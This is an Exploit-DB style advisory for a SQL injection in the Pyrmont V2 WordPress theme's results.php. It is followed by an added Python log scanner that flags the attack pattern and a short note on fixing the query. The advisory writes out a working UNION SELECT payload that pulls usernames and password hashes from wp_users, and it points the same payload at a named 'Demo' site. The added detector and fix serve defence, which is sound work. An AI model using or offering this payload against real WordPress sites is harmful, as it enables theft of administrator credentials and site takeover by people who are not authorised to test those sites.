# Title: WordPress and Pyrmont V2. SQL Injection Vulnerability
# EDB-ID: 10535
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Gamoscu
# Published: 2009-12-18
# Verified: no
#############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability
# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2
# Author: Gamoscu
# Site: www.1923turk.biz
# Site: http://gamoscu.wordpress.com/
##############################################################
# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),
3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
# Demo: http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
##############################################################
# Greetz: Manas58 Baybora Delibey Tiamo Psiko
##############################################################
The homeland is loved through deeds, not words
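For defenders, a log check for the request pattern above, as an added example that is not part of the original advisory or the theme's code. It assumes combined-format access logs and that a legitimate `id` for results.php is a plain decimal integer; the names `classify_id` and `scan` and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate results.php request carries a plain decimal id.
INT_ID = re.compile(r"\d+")
# SQL tokens from the advisory's payload; none belongs in a numeric id.
SQLI_HINT = re.compile(r"\b(union|select|concat(_ws)?|from|wp_users)\b", re.I)
# Request line of a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_id(value):
    """Return 'ok', 'malformed' or 'sqli' for one URL-decoded id value."""
    if INT_ID.fullmatch(value):
        return "ok"
    return "sqli" if SQLI_HINT.search(value) else "malformed"

def scan(lines, script="results.php", param="id"):
    """Return (client_ip, verdict, decoded_value) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes %XX and maps '+' to a space, as PHP does for $_GET
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, value))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [18/Dec/2009:10:00:01 +0000] "GET /path/results.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Dec/2009:10:00:05 +0000] "GET /path/results.php?id=-9999+union+select+1,'
    'concat_ws(0x3a,user_login,user_pass),3+from+wp_users HTTP/1.1" 200 6200',
    '203.0.113.5 - - [18/Dec/2009:10:00:09 +0000] "GET /path/results.php?id=-1%20UNION%20SELECT%201 HTTP/1.1" 200 900',
    '192.0.2.10 - - [18/Dec/2009:10:00:12 +0000] "GET /path/results.php?id=12abc HTTP/1.1" 200 300',
    '192.0.2.44 - - [18/Dec/2009:10:00:15 +0000] "GET /path/index.php?id=1+union+select+1 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE):
        print(f"{verdict:9} {ip:14} id={value!r}")
```

Detection does not replace the fix: the script should cast `id` to an integer, or bind it through WordPress's `$wpdb->prepare()` with a `%d` placeholder, before it reaches the query.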



